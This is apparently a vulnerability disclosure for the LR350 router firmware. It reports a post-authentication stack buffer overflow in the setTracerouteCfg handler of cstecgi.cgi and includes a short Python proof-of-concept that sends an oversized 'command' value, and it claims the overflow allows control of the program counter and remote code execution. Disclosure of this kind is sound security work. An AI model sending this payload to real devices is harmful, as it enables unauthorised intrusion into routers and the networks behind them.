LR350 - bof - setTracerouteCfg

Hi, we found a post-authentication stack buffer overflow at **LR350 (**Firmware version V9.3.5u.6369_B20220309), and contact you at the first time.

Untitled

In function ****setTracerouteCfg ****of the file /cgi-bin/cstecgi.cgi, the size of command is not checked, one can send a very long string to overflow the stack buffer via sprintf.

PoC

import requests

url = "<http://192.168.17.220:80/cgi-bin/cstecgi.cgi>"
cookie = {"Cookie":"uid=1234"}
data = {'topicurl' : "setTracerouteCfg",
"command" : "a"*0x100}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)

The PC register can be hijacked, which means it can result in RCE.

Untitled